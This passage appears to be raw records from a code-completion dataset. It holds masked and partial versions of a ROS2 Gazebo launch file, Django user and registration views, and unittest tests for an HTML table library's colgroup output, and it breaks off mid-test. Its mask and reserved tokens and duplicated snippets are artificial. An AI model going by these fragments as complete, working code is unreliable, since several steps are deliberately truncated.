'-entity', 'cart', '-x', '0', '-y', '0.2', '-z', '0.05', '-file',
cart_sdf])
return launch.LaunchDescription([cart_spawner])
|
normal
|
{
"blob_id": "cc74163d5dbcc2b2ca0fe5222692f6f5e45f73fe",
"index": 2377,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_launch_description():\n cart_sdf = os.path.join(get_package_share_directory('crs_support'),\n 'sdf', 'cart.sdf')\n cart_spawner = launch_ros.actions.Node(node_name='spawn_node', package=\n 'gazebo_ros', node_executable='spawn_entity.py', arguments=[\n '-entity', 'cart', '-x', '0', '-y', '0.2', '-z', '0.05', '-file',\n cart_sdf])\n return launch.LaunchDescription([cart_spawner])\n",
"step-3": "import os\nfrom pathlib import Path\nimport shutil\nfrom ament_index_python.packages import get_package_share_directory, get_package_prefix\nimport launch\nimport launch_ros.actions\n\n\ndef generate_launch_description():\n cart_sdf = os.path.join(get_package_share_directory('crs_support'),\n 'sdf', 'cart.sdf')\n cart_spawner = launch_ros.actions.Node(node_name='spawn_node', package=\n 'gazebo_ros', node_executable='spawn_entity.py', arguments=[\n '-entity', 'cart', '-x', '0', '-y', '0.2', '-z', '0.05', '-file',\n cart_sdf])\n return launch.LaunchDescription([cart_spawner])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=
user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {'user_creation_form': user_creation_form}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def user_view(request, username):
"""View the user
"""
import datetime
user = get_object_or_404(auth_models.User, username=username, is_active
=True)
now = datetime.datetime.now()
post_count = blog_models.Post.objects.filter(author=user,
publish_at__lte=now).count()
email_verification_form = None
if request.user.id == user.id and not user.get_profile().is_verified:
data = request.POST.copy() or None
email_verification_form = users_forms.EmailVerificationForm(data=data)
if email_verification_form.is_bound:
email_verification_form.data['user'] = request.user
if email_verification_form.is_valid():
email_verification_form.save()
messages.info(request, 'Tunnuksesi on aktivoitu!')
return HttpResponseRedirect(reverse('user', args=(request.
user.username,)))
context = {'viewed_user': user, 'post_count': post_count,
'email_verification_form': email_verification_form}
req_ctx = RequestContext(request, context)
return render_to_response('user.html', req_ctx)
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=
user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {'user_creation_form': user_creation_form}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
from django.contrib.auth.decorators import login_required
from django.contrib.auth import models as auth_models
from django.contrib.auth import forms as auth_forms
from django.contrib.auth import authenticate, login
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_noop as _
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django_mises.blog import models as blog_models
from django_mises.users import forms as users_forms
from django_mises import email_helpers
def user_view(request, username):
"""View the user
"""
import datetime
user = get_object_or_404(auth_models.User, username=username, is_active
=True)
now = datetime.datetime.now()
post_count = blog_models.Post.objects.filter(author=user,
publish_at__lte=now).count()
email_verification_form = None
if request.user.id == user.id and not user.get_profile().is_verified:
data = request.POST.copy() or None
email_verification_form = users_forms.EmailVerificationForm(data=data)
if email_verification_form.is_bound:
email_verification_form.data['user'] = request.user
if email_verification_form.is_valid():
email_verification_form.save()
messages.info(request, 'Tunnuksesi on aktivoitu!')
return HttpResponseRedirect(reverse('user', args=(request.
user.username,)))
context = {'viewed_user': user, 'post_count': post_count,
'email_verification_form': email_verification_form}
req_ctx = RequestContext(request, context)
return render_to_response('user.html', req_ctx)
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=
user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {'user_creation_form': user_creation_form}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
# vim: tabstop=4 expandtab autoindent shiftwidth=4 fileencoding=utf-8
from django.contrib.auth.decorators import login_required
from django.contrib.auth import models as auth_models
from django.contrib.auth import forms as auth_forms
from django.contrib.auth import authenticate, login
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_noop as _
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django_mises.blog import models as blog_models
from django_mises.users import forms as users_forms
from django_mises import email_helpers
def user_view(request, username):
"""View the user
"""
import datetime
user = get_object_or_404(auth_models.User, username=username, is_active=True)
now = datetime.datetime.now()
post_count = blog_models.Post.objects.filter(author=user, publish_at__lte=now).count()
# Needs verification?
email_verification_form = None
if request.user.id == user.id and not user.get_profile().is_verified:
data = request.POST.copy() or None
email_verification_form = users_forms.EmailVerificationForm(data=data)
if email_verification_form.is_bound:
email_verification_form.data['user'] = request.user
if email_verification_form.is_valid():
email_verification_form.save()
messages.info(request, 'Tunnuksesi on aktivoitu!')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
# Avoid template namespace clash
context = {
'viewed_user': user,
'post_count': post_count,
'email_verification_form': email_verification_form,
}
req_ctx = RequestContext(request, context)
return render_to_response('user.html', req_ctx)
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {
'user_creation_form': user_creation_form,
}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {
'code': verification_code,
}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject, 'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
# EOF
|
flexible
|
{
"blob_id": "22da05d9bf6139a0306bfb2d1df96e9e2cf6a0c6",
"index": 475,
"step-1": "<mask token>\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-2": "<mask token>\n\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n data = request.POST.copy() or None\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n user = authenticate(username=user.username, password=\n user_creation_form.cleaned_data['password1'])\n login(request, user)\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n context = {'user_creation_form': user_creation_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('register.html', req_ctx)\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-3": "<mask token>\n\n\ndef user_view(request, username):\n \"\"\"View the user\n \"\"\"\n import datetime\n user = get_object_or_404(auth_models.User, username=username, is_active\n =True)\n now = datetime.datetime.now()\n post_count = blog_models.Post.objects.filter(author=user,\n publish_at__lte=now).count()\n email_verification_form = None\n if request.user.id == user.id and not user.get_profile().is_verified:\n data = request.POST.copy() or None\n email_verification_form = users_forms.EmailVerificationForm(data=data)\n if email_verification_form.is_bound:\n email_verification_form.data['user'] = request.user\n if email_verification_form.is_valid():\n email_verification_form.save()\n messages.info(request, 'Tunnuksesi on aktivoitu!')\n return HttpResponseRedirect(reverse('user', args=(request.\n user.username,)))\n context = {'viewed_user': user, 'post_count': post_count,\n 'email_verification_form': email_verification_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('user.html', req_ctx)\n\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n data = request.POST.copy() or None\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n user = authenticate(username=user.username, password=\n user_creation_form.cleaned_data['password1'])\n login(request, user)\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n context = {'user_creation_form': user_creation_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('register.html', req_ctx)\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-4": "from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import models as auth_models\nfrom django.contrib.auth import forms as auth_forms\nfrom django.contrib.auth import authenticate, login\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_noop as _\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.template import RequestContext\nfrom django_mises.blog import models as blog_models\nfrom django_mises.users import forms as users_forms\nfrom django_mises import email_helpers\n\n\ndef user_view(request, username):\n \"\"\"View the user\n \"\"\"\n import datetime\n user = get_object_or_404(auth_models.User, username=username, is_active\n =True)\n now = datetime.datetime.now()\n post_count = blog_models.Post.objects.filter(author=user,\n publish_at__lte=now).count()\n email_verification_form = None\n if request.user.id == user.id and not user.get_profile().is_verified:\n data = request.POST.copy() or None\n email_verification_form = users_forms.EmailVerificationForm(data=data)\n if email_verification_form.is_bound:\n email_verification_form.data['user'] = request.user\n if email_verification_form.is_valid():\n email_verification_form.save()\n messages.info(request, 'Tunnuksesi on aktivoitu!')\n return HttpResponseRedirect(reverse('user', args=(request.\n user.username,)))\n context = {'viewed_user': user, 'post_count': post_count,\n 'email_verification_form': email_verification_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('user.html', req_ctx)\n\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n data = request.POST.copy() or None\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n user = authenticate(username=user.username, password=\n user_creation_form.cleaned_data['password1'])\n login(request, user)\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n context = {'user_creation_form': user_creation_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('register.html', req_ctx)\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-5": "# vim: tabstop=4 expandtab autoindent shiftwidth=4 fileencoding=utf-8\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib.auth import models as auth_models\nfrom django.contrib.auth import forms as auth_forms\nfrom django.contrib.auth import authenticate, login\n\nfrom django.core.urlresolvers import reverse\n\nfrom django.utils.translation import ugettext_noop as _\n\nfrom django.contrib import messages\n\nfrom django.http import HttpResponseRedirect\n\nfrom django.shortcuts import get_object_or_404, render_to_response\n\nfrom django.template import RequestContext\n\nfrom django_mises.blog import models as blog_models\n\nfrom django_mises.users import forms as users_forms\n\nfrom django_mises import email_helpers\n\ndef user_view(request, username):\n \"\"\"View the user\n \"\"\"\n\n import datetime\n\n user = get_object_or_404(auth_models.User, username=username, is_active=True)\n\n now = datetime.datetime.now()\n\n post_count = blog_models.Post.objects.filter(author=user, publish_at__lte=now).count()\n\n # Needs verification?\n email_verification_form = None\n if request.user.id == user.id and not user.get_profile().is_verified:\n data = request.POST.copy() or None\n\n email_verification_form = users_forms.EmailVerificationForm(data=data)\n if email_verification_form.is_bound:\n email_verification_form.data['user'] = request.user\n if email_verification_form.is_valid():\n email_verification_form.save()\n\n messages.info(request, 'Tunnuksesi on aktivoitu!')\n\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n\n # Avoid template namespace clash\n context = {\n 'viewed_user': user,\n 'post_count': post_count,\n 'email_verification_form': email_verification_form,\n }\n req_ctx = RequestContext(request, context)\n\n return render_to_response('user.html', req_ctx)\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n\n data = request.POST.copy() or None\n\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n\n user = authenticate(username=user.username, password=user_creation_form.cleaned_data['password1'])\n login(request, user)\n\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n\n context = {\n 'user_creation_form': user_creation_form,\n }\n req_ctx = RequestContext(request, context)\n\n return render_to_response('register.html', req_ctx)\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {\n 'code': verification_code,\n }\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject, 'send_verification_code.txt', extractx)\n\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n\n# EOF\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class TestColGroup(unittest.TestCase):
<|reserved_special_token_0|>
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate(), 'colgroup present from generate()')
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'
, gen.generate({'tgroups': 2}),
'colgroup present from generate() with tgroups')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None}), 'colgroup can be overriden')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {
'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate(), 'colgroup present from generate()')
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'
, gen.generate({'tgroups': 2}),
'colgroup present from generate() with tgroups')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None}), 'colgroup can be overriden')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {
'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from Spreadsheet.HTML import Table
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate(), 'colgroup present from generate()')
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'
, gen.generate({'tgroups': 2}),
'colgroup present from generate() with tgroups')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None}), 'colgroup can be overriden')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {
'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
